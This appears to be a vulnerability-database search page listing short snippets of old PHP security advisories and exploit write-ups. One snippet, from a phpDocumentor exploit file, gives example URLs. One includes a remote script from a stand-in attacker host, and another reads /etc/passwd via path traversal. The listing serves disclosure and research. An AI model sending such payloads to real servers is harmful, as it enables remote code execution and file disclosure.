710 matches found
PT-2006-4865 · Php +1
Name of the Vulnerable Software and Affected Versions: PHP versions 4.4.3 and earlier; PHP versions 5.1.4 and earlier. Description: The issue allows context-dependent attackers to execute arbitrary code via a sscanf PHP function call that performs argument swapping. This can trigger a buffer...
security flaw
zend_hash_del_key_or_index in zend_hash.c in PHP before 4.4.3 and 5.x before 5.1.3 can cause zend_hash_del to delete the wrong element, which prevents a variable from being unset even when the PHP unset function is called, which might cause the variable's value to be used in security-relevant operations...
error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2. Author: Maksymilian Arciemowicz cXIb8O3. Date: Written: 10.6.2006; Public: 26.06.2006. From SECURITYREASON.COM. CVE-2006-3011. 0. Description: PHP is an HTML-embedded scripting language. Much of i...
PHPKIT >= 1.6.1r2 arbitrary local/remote inclusion (unproperly patched in previous versions)
PHPKit = v.1.6.1 release 2 remote code execution. software: site: www.phpkit.de; description: a Content Management / homepage / community building software written in PHP language...
phpdocumentor_130rc4_incl_expl.txt
PhpDocumentor also, if magic_quotes_gpc off: http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=http://attacker/script.txt%00 http://target/pathtophpdocumentor/Documentation/tests/bug-559668.php?FORUMLIB=../../../../../../../etc/passwd%00...
PhpDocumentor <= 1.3.0 rc4 Arbitrary remote/local inclusion
PhpDocumentor = 1.3.0 rc4 Arbitrary remote/local inclusion. software: site: http://www.phpdoc.org/; description: "phpDocumentor, sometimes referred to as phpdoc or phpdocu, is the current standard auto-documentation tool for the php language. Similar to Javadoc, and written in php,...
security flaw
The deserialization code in PHP before 4.3.10 and PHP 5.x up to 5.0.2 allows remote attackers to cause a denial of service and execute arbitrary code via untrusted data to the unserialize function that may trigger "information disclosure, double-free and negative reference index array underflow"...
athena.txt
Language: PHP; Script: Athena; Version: 0.1a; Official website: http://sourceforge.net/projects/athena; Problem: Remote file inclusion; Discovered by: beford & GB. Description: A simple website management system written in oo php that uses a mysql database to store user and group rights and...
jelsoftvb.txt
Vendor: Jelsoft Enterprises; URL: http://www.vbulletin.com; Version: vBulletin 3.0.0 RC4 && Others; Risk: Cross Site Scripting. Description: vBulletin is a powerful, scalable and fully customisable forums package for your web site. Based on the PHP language, backed with a blisteringly fast MySQL...
BSA-2016-006
Summary: Security Advisory ID: BSA-2016-006; Component: PHP; Revision: 3.0 N/A...